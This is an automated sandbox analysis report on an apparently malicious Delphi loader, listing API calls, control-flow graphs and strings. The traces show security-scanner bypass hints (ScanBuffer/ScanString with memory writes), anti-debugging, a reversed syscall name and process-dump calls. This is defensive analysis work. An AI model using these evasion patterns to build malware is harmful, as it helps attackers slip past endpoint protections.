                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                              • API String ID: 2852987580-51457883
                                                                                                                              • Opcode ID: 12ec2a5cf8b09d876e8e1cf9cbb6f2b4238d21fea9a8bd697a77f19f1d031681
                                                                                                                              • Instruction ID: 70296f05d11a88401721e9d019b62269f8676719c0b985bc7c43bd063f6bc056
                                                                                                                              • Opcode Fuzzy Hash: 12ec2a5cf8b09d876e8e1cf9cbb6f2b4238d21fea9a8bd697a77f19f1d031681
                                                                                                                              • Instruction Fuzzy Hash: F5E2FE35A50228DFDB12EB64CCD0ADE73BAAF55310F2045E1E14DABA14DE34AE4ACF51

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 8510 2b25a78-2b25ab9 GetModuleFileNameA RegOpenKeyExA 8511 2b25afb-2b25b3e call 2b258b4 RegQueryValueExA 8510->8511 8512 2b25abb-2b25ad7 RegOpenKeyExA 8510->8512 8517 2b25b62-2b25b7c RegCloseKey 8511->8517 8518 2b25b40-2b25b5c RegQueryValueExA 8511->8518 8512->8511 8514 2b25ad9-2b25af5 RegOpenKeyExA 8512->8514 8514->8511 8515 2b25b84-2b25bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8514->8515 8519 2b25bbb-2b25bbf 8515->8519 8520 2b25c9e-2b25ca5 8515->8520 8518->8517 8521 2b25b5e 8518->8521 8523 2b25bc1-2b25bc5 8519->8523 8524 2b25bcb-2b25be1 lstrlenA 8519->8524 8521->8517 8523->8520 8523->8524 8525 2b25be4-2b25be7 8524->8525 8526 2b25bf3-2b25bfb 8525->8526 8527 2b25be9-2b25bf1 8525->8527 8526->8520 8529 2b25c01-2b25c06 8526->8529 8527->8526 8528 2b25be3 8527->8528 8528->8525 8530 2b25c30-2b25c32 8529->8530 8531 2b25c08-2b25c2e lstrcpynA LoadLibraryExA 8529->8531 8530->8520 8532 2b25c34-2b25c38 8530->8532 8531->8530 8532->8520 8533 2b25c3a-2b25c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8520 8534 2b25c6c-2b25c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8520
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4D790), ref: 02B25A94
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AD0
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25AEE
                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B37
                                                                                                                              • RegQueryValueExA.ADVAPI32(?,02B25CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001), ref: 02B25B55
                                                                                                                              • RegCloseKey.ADVAPI32(?,02B25B84,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25B77
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25B94
                                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BA1
                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BA7
                                                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25BD2
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C19
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C29
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C51
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C61
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25C87
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25C97
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                              • API String ID: 1759228003-2375825460
                                                                                                                              • Opcode ID: 9065ad0a8360442190b35c3e2e748f86645ee5d370dc3b50e3ecb94d5da7d839
                                                                                                                              • Instruction ID: 4bd932c78b7b0ae43d0d2699d52b0914be321c09d70b45ade323b729943c388b
                                                                                                                              • Opcode Fuzzy Hash: 9065ad0a8360442190b35c3e2e748f86645ee5d370dc3b50e3ecb94d5da7d839
                                                                                                                              • Instruction Fuzzy Hash: 84515371A5032C7AFB25DAA88C46FEF77AD9B04744F8001E1B64CE6181E6749A488FA5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 10523 2b38798-2b387bd LoadLibraryW 10524 2b38807-2b3880d 10523->10524 10525 2b387bf-2b387d7 GetProcAddress 10523->10525 10526 2b387d9-2b387f8 call 2b37cf8 10525->10526 10527 2b387fc-2b38802 FreeLibrary 10525->10527 10526->10527 10530 2b387fa 10526->10530 10527->10524 10530->10527
                                                                                                                              APIs
                                                                                                                              • LoadLibraryW.KERNEL32(bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                                                • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                                                              • API String ID: 1002360270-4067648912
                                                                                                                              • Opcode ID: 306977690a6c919f8d33b30bb4668b0fc36ed781fd69c50223371d65591a658c
                                                                                                                              • Instruction ID: 8a5edc7cfb20edf46ff924efe6e7fdd27d4fd4135212d1152950f0671cfba796
                                                                                                                              • Opcode Fuzzy Hash: 306977690a6c919f8d33b30bb4668b0fc36ed781fd69c50223371d65591a658c
                                                                                                                              • Instruction Fuzzy Hash: 7CF0F671EA3324BEEB11AF6DAC44FB6379CE7823D4F0089AAB10C87540C7701826CB50

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 10540 2b3ebe8-2b3ec02 GetModuleHandleW 10541 2b3ec04-2b3ec16 GetProcAddress 10540->10541 10542 2b3ec2e-2b3ec36 10540->10542 10541->10542 10543 2b3ec18-2b3ec28 CheckRemoteDebuggerPresent 10541->10543 10543->10542 10544 2b3ec2a 10543->10544 10544->10542
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3EBF8
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3EC0A
                                                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3EC21
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                              • API String ID: 35162468-539270669
                                                                                                                              • Opcode ID: 9f427d319681537244f2af0cec43e8d4813bf7eb02b0f697c03f7925e479e84f
                                                                                                                              • Instruction ID: 36edf0b448852898b8c0320bd71328b9f441e0f2367a0802d6d2026963a73c7c
                                                                                                                              • Opcode Fuzzy Hash: 9f427d319681537244f2af0cec43e8d4813bf7eb02b0f697c03f7925e479e84f
                                                                                                                              • Instruction Fuzzy Hash: 39F0A03090425CAEEB13AAAC88887DCFBA99F09328FA407D6A424B21D1E7755694C651

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DBE3
                                                                                                                              • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DC13
                                                                                                                              • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DC28
                                                                                                                              • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DC54
                                                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DC5D
                                                                                                                                • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1897104825-0
                                                                                                                              • Opcode ID: 5c3dce003154bd0d2c999eaffad051ac3dfd10ce2d67b7be5626698bd90203fa
                                                                                                                              • Instruction ID: 06edcd81b079114e43769282066cb6bac84a80f8c630645dead5d9726a2fcf3a
                                                                                                                              • Opcode Fuzzy Hash: 5c3dce003154bd0d2c999eaffad051ac3dfd10ce2d67b7be5626698bd90203fa
                                                                                                                              • Instruction Fuzzy Hash: 68210375A50319BEEB11EAE4CC46FEE77BDEB08700F5005A1B704F71C0DAB4AA048B95

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E42E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CheckConnectionInternet
                                                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                              • API String ID: 3847983778-3852638603
                                                                                                                              • Opcode ID: 7a797854947e8480ca93950aed7e644b1d959fdbe0f004d08d1ed689d3c99cfd
                                                                                                                              • Instruction ID: cb1ff9b933552fd49c799d69fa3e744fe6fb54d56ffe49df04c925ced8d9b85f
                                                                                                                              • Opcode Fuzzy Hash: 7a797854947e8480ca93950aed7e644b1d959fdbe0f004d08d1ed689d3c99cfd
                                                                                                                              • Instruction Fuzzy Hash: B8412135B102189FEB02EBA4DC41ADEB3FAEF4C710F1148A6E555B7A50DA74ED098F50

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
                                                                                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
                                                                                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
                                                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3764614163-0
                                                                                                                              • Opcode ID: c5df92261042b6cc634f3bff3e87dcb399df58e0a4b0149838a7730d2f57b06a
                                                                                                                              • Instruction ID: 905621b6259aaa7755e7909b5cc6afafbe30b01d1cc0859b74b1836ac1ea43bc
                                                                                                                              • Opcode Fuzzy Hash: c5df92261042b6cc634f3bff3e87dcb399df58e0a4b0149838a7730d2f57b06a
                                                                                                                              • Instruction Fuzzy Hash: 9321FF71A40319BAEB11EAE4CD42FDEB7BDEB04B00F5045A1B604F75D0D7B06F048A65
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                              • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                              • API String ID: 3130163322-2353454454
                                                                                                                              • Opcode ID: 3fd5adf6e5416903907565d791440ba95b4f8232fa1156fd57cedbb187cea5ae
                                                                                                                              • Instruction ID: 9cc3bc0a6e313e202488f56eaee7c66dd24cbaf687a8aaff39c4c67155a6f3d7
                                                                                                                              • Opcode Fuzzy Hash: 3fd5adf6e5416903907565d791440ba95b4f8232fa1156fd57cedbb187cea5ae
                                                                                                                              • Instruction Fuzzy Hash: 8511D0B6650208BFEB41EEACDD81F9A37EDEB4C710F5144A0BA0CE7A40C634E9148B61
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                              • API String ID: 4072585319-445027087
                                                                                                                              • Opcode ID: 74cf4a311dc8ea61ca004427ec013a5b89bfb2aaa586ab6fddee0c041c4fa870
                                                                                                                              • Instruction ID: 06255f0686641808faaa8339eed2742932e287a1922ef921a54ccb927c6d9abd
                                                                                                                              • Opcode Fuzzy Hash: 74cf4a311dc8ea61ca004427ec013a5b89bfb2aaa586ab6fddee0c041c4fa870
                                                                                                                              • Instruction Fuzzy Hash: 47111E75650208BFEB01EFA4DC41E9EB7FDEB48710F5184A1F918E7A40DA30AA15DB61
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                              • API String ID: 4072585319-445027087
                                                                                                                              • Opcode ID: db0b7886bf4cd4e7dfa28968a1590ff0f1281a8b688c3975431a6aed9dcfed13
                                                                                                                              • Instruction ID: 640fc1c9fc663f496ea03b43a532041b52c29d3713c5d231b6f8012e4c4f273e
                                                                                                                              • Opcode Fuzzy Hash: db0b7886bf4cd4e7dfa28968a1590ff0f1281a8b688c3975431a6aed9dcfed13
                                                                                                                              • Instruction Fuzzy Hash: D5111B75650208BFEB01EFA4DC81E9EB7BDEB48710F5184A1F918E7A40DA30AA15DB61
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
